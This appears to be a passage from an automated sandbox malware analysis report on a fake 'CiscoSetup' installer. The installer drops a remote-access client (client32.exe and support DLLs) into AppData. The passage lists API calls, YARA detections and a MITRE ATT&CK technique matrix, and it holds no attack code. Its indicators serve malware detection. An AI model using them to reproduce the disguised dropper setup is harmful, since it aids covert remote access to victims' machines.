                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_111703D9
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11170500
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,6_2_6891FAE1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_6892DB7C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,6_2_6892DC99
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_68921CC1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_6892DC56
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_68921DB6
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_68921EB8
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_68921E5D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_68920F39
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_68922089
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_689221DC
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: EnumSystemLocalesA,6_2_68922151
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_68922175
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_689202AD
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_68922218
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_68921257
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,6_2_68921680
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,6_2_68B4888A
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,9_2_1117053C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,9_2_11167B5E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_11170011
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_11170500
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_11170499
                                  Source: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1101D180 __time64,SetRect,GetLocalTime,6_2_1101D180
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1103B220 _calloc,GetUserNameA,_free,_calloc,_free,6_2_1103B220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_1109D4A0
                                  Source: is-H5812.tmp.2.drBinary or memory string: r?IsOs_WIN_VISTA@@YA_NXZ
                                  Source: is-2TJID.tmp.2.drBinary or memory string: ?GetOsVersion@@YA?AUMYOSVERSION@@XZ\?IsOs_MAC@@YA_NXZq?IsOs_WIN_8_Only@@YA_NXZ
                                  Source: is-H5812.tmp.2.drBinary or memory string: ?DeleteUser@CProcessApi@@SAJQA_W@Zr?IsOs_WIN_VISTA@@YA_NXZvpncommon.dllIPathFileExistsWSHLWAPI.dll
                                  Source: is-2TJID.tmp.2.drBinary or memory string: p?IsOs_WIN_8Point10_Only@@YA_NXZ
                                  Source: is-2TJID.tmp.2.drBinary or memory string: ?MakeSureDirectoryPathExists@@YA_NPB_W@Zl?IsOs_WIN_7_Only@@YA_NXZi
                                  Source: is-2TJID.tmp.2.drBinary or memory string: l?IsOs_WIN_7_Only@@YA_NXZ
                                  Source: is-2TJID.tmp.2.drBinary or memory string: GetCurrentTimeSecondss?IsOs_WIN_VISTA_Only@@YA_NXZR
                                  Source: is-2TJID.tmp.2.drBinary or memory string: ?CreateMultitonInstance@CExecutionContext@@SAJAAPAV1@W4INSTANCE_ID@1@@ZW?IsOs_LINUX@@YA_NXZp?IsOs_WIN_8Point10_Only@@YA_NXZ
                                  Source: is-2TJID.tmp.2.drBinary or memory string: q?IsOs_WIN_8_Only@@YA_NXZ
                                  Source: is-2TJID.tmp.2.drBinary or memory string: s?IsOs_WIN_VISTA_Only@@YA_NXZ
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1106F210 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_1106F210
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_688FA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,6_2_688FA980
                                  Source: Yara matchFile source: 10.2.client32.exe.6dec0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.client32.exe.6dec0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.6dec0000.6.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.68bf0000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.client32.exe.68bf0000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.68bf0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.688f0000.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000009.00000000.2495587028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000000.2576329982.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2577820279.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000002.4582994339.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000002.4598217115.0000000005101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000000.2403584821.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2496967852.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000003.2705520820.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3412, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4176, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 1112, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 6484, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure2
                                  Valid Accounts                                  		1
                                  Windows Management Instrumentation                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		1
                                  Deobfuscate/Decode Files or Information                                  		1
                                  Network Sniffing                                  		11
                                  System Time Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		1
                                  Ingress Tool Transfer                                  		Exfiltration Over Other Network Medium1
                                  System Shutdown/Reboot
                                  CredentialsDomainsDefault Accounts3
                                  Native API                                  		1
                                  DLL Search Order Hijacking                                  		1
                                  DLL Search Order Hijacking                                  		3
                                  Obfuscated Files or Information                                  		1
                                  Input Capture                                  		1
                                  Account Discovery                                  		Remote Desktop Protocol1
                                  Screen Capture                                  		22
                                  Encrypted Channel                                  		Exfiltration Over Bluetooth1
                                  Defacement
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter                                  		2
